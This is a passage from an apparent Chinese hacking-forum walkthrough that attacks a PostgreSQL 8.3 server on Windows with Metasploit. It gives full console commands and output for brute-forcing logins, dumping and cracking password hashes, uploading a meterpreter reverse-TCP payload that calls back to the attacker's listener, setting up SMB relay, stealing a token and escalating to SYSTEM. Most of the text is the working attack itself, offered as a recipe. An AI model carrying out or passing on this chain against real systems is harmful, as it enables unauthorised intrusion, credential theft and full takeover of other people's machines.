  29. [*] 5.5.5.3:5432 Postgres - [10/14] - Trying username:'admin' with password:'password' on database 'template1'
  30. [-] 5.5.5.3:5432 Postgres - Invalid username or password: 'admin':'password'
  31. [-] 5.5.5.3:5432 Postgres - [10/14] - Username/Password failed.
  32. [*] 5.5.5.3:5432 Postgres - [11/14] - Trying username:'postgres' with password:'123456' on database 'template1'
  33. [+] 5.5.5.3:5432 Postgres - Logged in to 'template1' with 'postgres':'123456'
  34. [+] 5.5.5.3:5432 Postgres - Success: postgres:123456 (Database 'template1' succeeded.)
  35. [*] 5.5.5.3:5432 Postgres - Disconnected
  36. [*] 5.5.5.3:5432 Postgres - [12/14] - Trying username:'' with password:'123456' on database 'template1'
  37. [-] 5.5.5.3:5432 Postgres - Invalid username or password: '':'123456'
  38. [-] 5.5.5.3:5432 Postgres - [12/14] - Username/Password failed.
  39. [*] 5.5.5.3:5432 Postgres - [13/14] - Trying username:'scott' with password:'123456' on database 'template1'
  40. [-] 5.5.5.3:5432 Postgres - Invalid username or password: 'scott':'123456'
  41. [-] 5.5.5.3:5432 Postgres - [13/14] - Username/Password failed.
  42. [*] 5.5.5.3:5432 Postgres - [14/14] - Trying username:'admin' with password:'123456' on database 'template1'
  43. [-] 5.5.5.3:5432 Postgres - Invalid username or password: 'admin':'123456'
  44. [-] 5.5.5.3:5432 Postgres - [14/14] - Username/Password failed.
  45. [*] Scanned 1 of 1 hosts (100% complete)
  46. [*] Auxiliary module execution completed
  47. msf  auxiliary(postgres_login) >
复制代码
成功一个 果然123456


查询版本
  1. msf  auxiliary(postgres_login) > use auxiliary/scanner/postgres/postgres_version
  2. msf  auxiliary(postgres_version) > show options

  3. Module options (auxiliary/scanner/postgres/postgres_version):

  4.    Name      Current Setting  Required  Description
  5.    ----      ---------------  --------  -----------
  6.    DATABASE  template1        yes       The database to authenticate against
  7.    PASSWORD                   no        The password for the specified username. Leave blank for a random password.
  8.    RHOSTS                     yes       The target address range or CIDR identifier
  9.    RPORT     5432             yes       The target port
  10.    THREADS   1                yes       The number of concurrent threads
  11.    USERNAME  postgres         yes       The username to authenticate as
  12.    VERBOSE   false            no        Enable verbose output

  13. msf  auxiliary(postgres_version) >
复制代码
写入IP 帐号密码 端口 你懂的
  1. msf  auxiliary(postgres_version) > set PASSWORD 123456
  2. PASSWORD => 123456
  3. msf  auxiliary(postgres_version) > set RHOSTS 5.5.5.3
  4. RHOSTS => 5.5.5.3
  5. msf  auxiliary(postgres_version) > exploit

  6. [*] 5.5.5.3:5432 Postgres - Version PostgreSQL 8.3.18, compiled by Visual C++ build 1400 (Post-Auth)
  7. [*] Scanned 1 of 1 hosts (100% complete)
  8. [*] Auxiliary module execution completed
  9. msf  auxiliary(postgres_version) >
复制代码
Version PostgreSQL 8.3.18 ^_^导出全部用户密码
  1. msf  auxiliary(postgres_version) > use auxiliary/scanner/postgres/postgres_hashdump
  2. msf  auxiliary(postgres_hashdump) > show options

  3. Module options (auxiliary/scanner/postgres/postgres_hashdump):

  4.    Name      Current Setting  Required  Description
  5.    ----      ---------------  --------  -----------
  6.    DATABASE  postgres         yes       The database to authenticate against
  7.    PASSWORD                   no        The password for the specified username. Leave blank for a random password.
  8.    RHOSTS                     yes       The target address range or CIDR identifier
  9.    RPORT     5432             yes       The target port
  10.    THREADS   1                yes       The number of concurrent threads
  11.    USERNAME  postgres         yes       The username to authenticate as

  12. msf  auxiliary(postgres_hashdump) > set RHOSTS 5.5.5.3
  13. RHOSTS => 5.5.5.3
  14. msf  auxiliary(postgres_hashdump) > set PASSWORD 123456
  15. PASSWORD => 123456
  16. msf  auxiliary(postgres_hashdump) > exploit

  17. [*] Query appears to have run successfully
  18. [+] Postgres Server Hashes
  19. ======================

  20. Username  Hash
  21. --------  ----
  22. dis9team  7ca3de2618396dfaa75515c29885396e
  23. postgres  a3556571e93b0d20722ba62be61e8c2d
  24. test      5a2e54ee57e5b7273b9a8fed78c1ebd8

  25. [*] Hash Table has been saved: /home/brk/.msf4/loot/20120312070326_default_5.5.5.3_postgres.hashes_956312.txt
  26. [*] Scanned 1 of 1 hosts (100% complete)
  27. [*] Auxiliary module execution completed
  28. msf  auxiliary(postgres_hashdump) >
复制代码
保存到了 /home/brk/.msf4/loot/20120312070326_default_5.5.5.3_postgres.hashes_956312.txt
查看一下:
  1. brk@Dis9Team:/tmp$ cat /home/brk/.msf4/loot/20120312070326_default_5.5.5.3_postgres.hashes_956312.txt
  2. Username,Hash
  3. "dis9team","7ca3de2618396dfaa75515c29885396e"
  4. "postgres","a3556571e93b0d20722ba62be61e8c2d"
  5. "test","5a2e54ee57e5b7273b9a8fed78c1ebd8"
  6. brk@Dis9Team:/tmp$
复制代码
同时已经记录在MSF数据库里面:
  1. msf  auxiliary(postgres_hashdump) > loot

  2. Loot
  3. ====

  4. host     service   type             name                             content     info             path
  5. ----     -------   ----             ----                             -------     ----             ----
  6. 5.5.5.3  postgres  postgres.hashes  5.5.5.3-5432_postgreshashes.txt  text/plain  Postgres Hashes  /home/brk/.msf4/loot/20120312070517_default_5.5.5.3_postgres.hashes_391828.txt

  7. msf  auxiliary(postgres_hashdump) >
复制代码
破解全部用户密码
  1. msf  auxiliary(postgres_hashdump) > use auxiliary/analyze/postgres_md5_crack
  2. msf  auxiliary(postgres_md5_crack) > show options

  3. Module options (auxiliary/analyze/postgres_md5_crack):

  4.    Name      Current Setting  Required  Description
  5.    ----      ---------------  --------  -----------
  6.    Munge     false            no        Munge the Wordlist (Slower)
  7.    Wordlist  /tmp/1.txt       no        The path to an optional Wordlist

  8. msf  auxiliary(postgres_md5_crack) > set Wordlist /tmp/1.txt
  9. Wordlist => /tmp/1.txt
  10. msf  auxiliary(postgres_md5_crack) > exploit

  11. [*] Processing wordlist...
  12. [*] Wordlist length: 88399
  13. [*] Attempting to crack hash: dis9team:7ca3de2618396dfaa75515c29885396e
  14. [+] Username: dis9team Pass: 123456
  15. [*] Attempting to crack hash: postgres:a3556571e93b0d20722ba62be61e8c2d
  16. [+] Username: postgres Pass: 123456
  17. [*] Attempting to crack hash: test:5a2e54ee57e5b7273b9a8fed78c1ebd8
  18. [+] Username: test Pass: 123456
  19. [*] Auxiliary module execution completed
  20. msf  auxiliary(postgres_md5_crack) >
复制代码
恩,破解出来了。。。。。。。。 数据库中的记录
  1. msf  auxiliary(postgres_md5_crack) > creds

  2. Credentials
  3. ===========

  4. host     port  user      pass    type      active?
  5. ----     ----  ----      ----    ----      -------
  6. 5.5.5.3  5432  dis9team  123456  password  true
  7. 5.5.5.3  5432  postgres  123456  password  true
  8. 5.5.5.3  5432  test      123456  password  true

  9. [*] Found 3 credentials.
  10. msf  auxiliary(postgres_md5_crack) >
复制代码
获得系统权限这个菜是种口味
  1. msf > use exploit/windows/postgres/postgres_payload
  2. msf  exploit(postgres_payload) > show options

  3. Module options (exploit/windows/postgres/postgres_payload):

  4.    Name      Current Setting  Required  Description
  5.    ----      ---------------  --------  -----------
  6.    DATABASE  template1        yes       The database to authenticate against
  7.    PASSWORD                   no        The password for the specified username. Leave blank for a random password.
  8.    RHOST                      yes       The target address
  9.    RPORT     5432             yes       The target port
  10.    USERNAME  postgres         yes       The username to authenticate as
  11.    VERBOSE   false            no        Enable verbose output


  12. Payload options (windows/meterpreter/reverse_tcp):

  13.    Name      Current Setting  Required  Description
  14.    ----      ---------------  --------  -----------
  15.    EXITFUNC  process          yes       Exit technique: seh, thread, process, none
  16.    LHOST     5.5.5.1          yes       The listen address
  17.    LPORT     4444             yes       The listen port


  18. Exploit target:

  19.    Id  Name
  20.    --  ----
  21.    0   Automatic


  22. msf  exploit(postgres_payload) > set RHOST 5.5.5.3
  23. RHOST => 5.5.5.3
  24. msf  exploit(postgres_payload) > set PASSWORD 123456
  25. PASSWORD => 123456
  26. msf  exploit(postgres_payload) > exploit

  27. [*] Started reverse handler on 5.5.5.1:4444
  28. [*] Authentication successful and vulnerable version 8.3 on Windows confirmed.
  29. [*] Uploaded Ekhazpht.dll as OID 51954 to table gclggupi(trnuqjax)
  30. [*] Command Stager progress -   1.48% done (1499/101465 bytes)
  31. [*] Command Stager progress -   2.95% done (2998/101465 bytes)
  32. [*] Command Stager progress -   4.43% done (4497/101465 bytes)
  33. [*] Command Stager progress -   5.91% done (5996/101465 bytes)
  34. [*] Command Stager progress -   7.39% done (7495/101465 bytes)
  35. [*] Command Stager progress -   8.86% done (8994/101465 bytes)
  36. [*] Command Stager progress -  10.34% done (10493/101465 bytes)
  37. [*] Command Stager progress -  11.82% done (11992/101465 bytes)
  38. [*] Command Stager progress -  13.30% done (13491/101465 bytes)
  39. [*] Command Stager progress -  14.77% done (14990/101465 bytes)
  40. [*] Command Stager progress -  16.25% done (16489/101465 bytes)
  41. [*] Command Stager progress -  17.73% done (17988/101465 bytes)
  42. [*] Command Stager progress -  19.21% done (19487/101465 bytes)
  43. [*] Command Stager progress -  20.68% done (20986/101465 bytes)
  44. [*] Command Stager progress -  22.16% done (22485/101465 bytes)
  45. [*] Command Stager progress -  23.64% done (23984/101465 bytes)
  46. [*] Command Stager progress -  25.12% done (25483/101465 bytes)
  47. [*] Command Stager progress -  26.59% done (26982/101465 bytes)
  48. [*] Command Stager progress -  28.07% done (28481/101465 bytes)
  49. [*] Command Stager progress -  29.55% done (29980/101465 bytes)
  50. [*] Command Stager progress -  31.02% done (31479/101465 bytes)
  51. [*] Command Stager progress -  32.50% done (32978/101465 bytes)
  52. [*] Command Stager progress -  33.98% done (34477/101465 bytes)
  53. [*] Command Stager progress -  35.46% done (35976/101465 bytes)
  54. [*] Command Stager progress -  36.93% done (37475/101465 bytes)
  55. [*] Command Stager progress -  38.41% done (38974/101465 bytes)
  56. [*] Command Stager progress -  39.89% done (40473/101465 bytes)
  57. [*] Command Stager progress -  41.37% done (41972/101465 bytes)
  58. [*] Command Stager progress -  42.84% done (43471/101465 bytes)
  59. [*] Command Stager progress -  44.32% done (44970/101465 bytes)
  60. [*] Command Stager progress -  45.80% done (46469/101465 bytes)
  61. [*] Command Stager progress -  47.28% done (47968/101465 bytes)
  62. [*] Command Stager progress -  48.75% done (49467/101465 bytes)
  63. [*] Command Stager progress -  50.23% done (50966/101465 bytes)
  64. [*] Command Stager progress -  51.71% done (52465/101465 bytes)
  65. [*] Command Stager progress -  53.18% done (53964/101465 bytes)
  66. [*] Command Stager progress -  54.66% done (55463/101465 bytes)
  67. [*] Command Stager progress -  56.14% done (56962/101465 bytes)
  68. [*] Command Stager progress -  57.62% done (58461/101465 bytes)
  69. [*] Command Stager progress -  59.09% done (59960/101465 bytes)
  70. [*] Command Stager progress -  60.57% done (61459/101465 bytes)
  71. [*] Command Stager progress -  62.05% done (62958/101465 bytes)
  72. [*] Command Stager progress -  63.53% done (64457/101465 bytes)
  73. [*] Command Stager progress -  65.00% done (65956/101465 bytes)
  74. [*] Command Stager progress -  66.48% done (67455/101465 bytes)
  75. [*] Command Stager progress -  67.96% done (68954/101465 bytes)
  76. [*] Command Stager progress -  69.44% done (70453/101465 bytes)
  77. [*] Command Stager progress -  70.91% done (71952/101465 bytes)
  78. [*] Command Stager progress -  72.39% done (73451/101465 bytes)
  79. [*] Command Stager progress -  73.87% done (74950/101465 bytes)
  80. [*] Command Stager progress -  75.35% done (76449/101465 bytes)
  81. [*] Command Stager progress -  76.82% done (77948/101465 bytes)
  82. [*] Command Stager progress -  78.30% done (79447/101465 bytes)
  83. [*] Command Stager progress -  79.78% done (80946/101465 bytes)
  84. [*] Command Stager progress -  81.25% done (82445/101465 bytes)
  85. [*] Command Stager progress -  82.73% done (83944/101465 bytes)
  86. [*] Command Stager progress -  84.21% done (85443/101465 bytes)
  87. [*] Command Stager progress -  85.69% done (86942/101465 bytes)
  88. [*] Command Stager progress -  87.16% done (88441/101465 bytes)
  89. [*] Command Stager progress -  88.64% done (89940/101465 bytes)
  90. [*] Command Stager progress -  90.12% done (91439/101465 bytes)
  91. [*] Command Stager progress -  91.60% done (92938/101465 bytes)
  92. [*] Command Stager progress -  93.07% done (94437/101465 bytes)
  93. [*] Command Stager progress -  94.55% done (95936/101465 bytes)
  94. [*] Command Stager progress -  96.03% done (97435/101465 bytes)
  95. [*] Command Stager progress -  97.51% done (98934/101465 bytes)
  96. [*] Command Stager progress -  98.95% done (100400/101465 bytes)
  97. [*] Command Stager progress - 100.00% done (101465/101465 bytes)
复制代码
PostgreSQL SMB ATTACK恩 首先链接数据库
  1. brk@Dis9Team:/tmp$ psql -h 5.5.5.3 -U postgres
  2. 用户 postgres 的口令:
  3. psql (8.4.11, 服务器 8.3.18)
  4. 警告:psql 版本8.4, 服务器版本8.3.
  5. 一些psql功能可能无法工作.
  6. 输入 "help" 来获取帮助信息.

  7. postgres=#
复制代码
生成smb relay
  1. msf  exploit(smb_relay) > exploit
  2. [*] Exploit running as background job.

  3. [*] Started reverse handler on 5.5.5.1:4444
  4. [*] Server started.
  5. msf  exploit(smb_relay) >
复制代码
创建个表:
  1. postgres=# CREATE TABLE sb(sb text);
  2. ERROR:  relation "sb" already exists
  3. postgres=#
复制代码
恩 我已经创建过了
读共享 获得SHELL低权限SHELL如果我有一个低权限SHELL,那么METASPLOIT能自动提升权限链接SHELL
  1. msf  auxiliary(browser_autopwn) > sessions

  2. Active sessions
  3. ===============

  4.   Id  Type                   Information                      Connection
  5.   --  ----                   -----------                      ----------
  6.   1   meterpreter x86/win32  DIS9TEAM-A1\admin @ DIS9TEAM-A1  5.5.5.1:3333 -> 5.5.5.3:1155 (5.5.5.3)

  7. msf  auxiliary(browser_autopwn) > sessions -i 1
  8. [*] Starting interaction with 1...

  9. meterpreter >
复制代码
查看权限
  1. meterpreter > getuid
  2. Server username: DIS9TEAM-A1\admin
  3. meterpreter >
复制代码
恩 不是系统权限权限提升额 蓝屏了。。
不扒 咱们重新来=.=
  1. meterpreter > ps

  2. Process list
  3. ============

  4. PID   Name              Arch  Session  User               Path
  5. ---   ----              ----  -------  ----               ----
  6. 0     [System Process]                                    
  7. 4     System                                             
  8. 112   pgagent.exe                                         
  9. 200   pg_ctl.exe                                          
  10. 264   postgres.exe                                       
  11. 364   SMSS.EXE                                            
  12. 520   httpd.exe                                          
  13. 588   csrss.exe                                          
  14. 612   winlogon.exe                                       
  15. 656   services.exe                                       
  16. 676   lsass.exe                                          
  17. 828   VBoxService.exe                                    
  18. 872   svchost.exe                                         
  19. 944   svchost.exe                                         
  20. 1040  svchost.exe                                         
  21. 1092  svchost.exe                                         
  22. 1144  postgres.exe                                       
  23. 1148  svchost.exe                                         
  24. 1224  postgres.exe                                       
  25. 1276  postgres.exe                                       
  26. 1280  postgres.exe                                       
  27. 1288  postgres.exe                                       
  28. 1300  postgres.exe                                       
  29. 1428  spoolsv.exe                                         
  30. 1692  Explorer.EXE      x86   0        DIS9TEAM-A1\admin  C:\WINDOWS\Explorer.EXE
  31. 1796  VBoxTray.exe      x86   0        DIS9TEAM-A1\admin  C:\WINDOWS\system32\VBoxTray.exe
  32. 1816  ctfmon.exe        x86   0        DIS9TEAM-A1\admin  C:\WINDOWS\system32\ctfmon.exe
  33. 1924  httpd.exe                                          
  34. 1968  mysqld.exe                                          
  35. 2652  alg.exe                                             
  36. 2836  wscntfy.exe       x86   0        DIS9TEAM-A1\admin  C:\WINDOWS\system32\wscntfy.exe
  37. 2988  wuauclt.exe                                         
  38. 3760  iexplore.exe      x86   0        DIS9TEAM-A1\admin  C:\Program Files\Internet Explorer\iexplore.exe
  39. 3952  notepad.exe       x86   0        DIS9TEAM-A1\admin  C:\WINDOWS\System32\notepad.exe
  40. meterpreter > steal_token 3760
  41. Stolen token with username: DIS9TEAM-A1\admin
  42. meterpreter > getsystem -h
  43. Usage: getsystem [options]

  44. Attempt to elevate your privilege to that of local system.

  45. OPTIONS:

  46.     -h        Help Banner.
  47.     -t   The technique to use. (Default to '0').
  48.                 0 : All techniques available
  49.                 1 : Service - Named Pipe Impersonation (In Memory/Admin)
  50.                 2 : Service - Named Pipe Impersonation (Dropper/Admin)
  51.                 3 : Service - Token Duplication (In Memory/Admin)
  52.                 4 : Exploit - KiTrap0D (In Memory/User)


  53. meterpreter > getsystem -t 1
  54. ...got system (via technique 1).
  55. meterpreter > getuid
  56. Server username: NT AUTHORITY\SYSTEM
  57. meterpreter >
复制代码
恩 成功了





附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-12-2 14:23

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部